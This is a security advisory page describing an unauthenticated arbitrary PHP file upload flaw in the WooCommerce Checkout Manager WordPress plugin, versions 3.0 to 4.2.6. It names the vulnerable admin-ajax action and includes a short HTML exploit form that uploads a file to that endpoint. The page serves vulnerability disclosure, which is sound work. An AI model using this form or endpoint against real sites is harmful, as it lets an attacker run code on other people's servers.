Unrestricted file upload in WooCommerce Checkout Manager



Published: 2019-04-26
Risk High
Patch available NO
Number of vulnerabilities 1
CVE-ID N/A
CWE-ID CWE-434
Exploitation vector Network
Public exploit Public exploit code for vulnerability #1 is available.
Vulnerable software
Subscribe
WooCommerce Checkout Manager
Web applications / Modules and components for CMS

Vendor Visser Labs

Security Bulletin

This security bulletin contains one high risk vulnerability.

1) Arbitrary file upload

EUVDB-ID: #VU18353

Risk: High

CVSSv3.1:

CVE-ID: N/A

CWE-ID:

Exploit availability:

Description

The vulnerability allows a remote attacker to compromise vulnerable application.

The vulnerability exists due to missing restrictions when uploading PHP files via the "/wp-admin/admin-ajax.php" URL, when action is set to "wccs_upload_file_func" and valid "order_id" identifier is set. A remote non-authenticated attacker can upload and execute arbitrary PHP file on the server.

Exploitation example:

<html>
<body>
<form action="http://[host]/wp-admin/admin-ajax.php?action=wccs_upload_file_func&order_id=[order ID]&name=test" method="POST" enctype="multipart/form-data">
<input type="file" name="test[1]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Mitigation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

Vulnerable software versions

WooCommerce Checkout Manager: 3.0 - 4.2.6

Fixed software versions

CPE2.3 External links

http://www.pluginvulnerabilities.com/2019/04/23/our-proactive-monitoring-caught-an-arbitrary-file-upload-vulnerability-in-woocommerce-checkout-manager/
http://medium.com/@xorloop/wordpress-security-researcher-gone-rogue-a76484ed0fc9


Q & A

Can this vulnerability be exploited remotely?

Is there known malware, which exploits this vulnerability?



###SIDEBAR###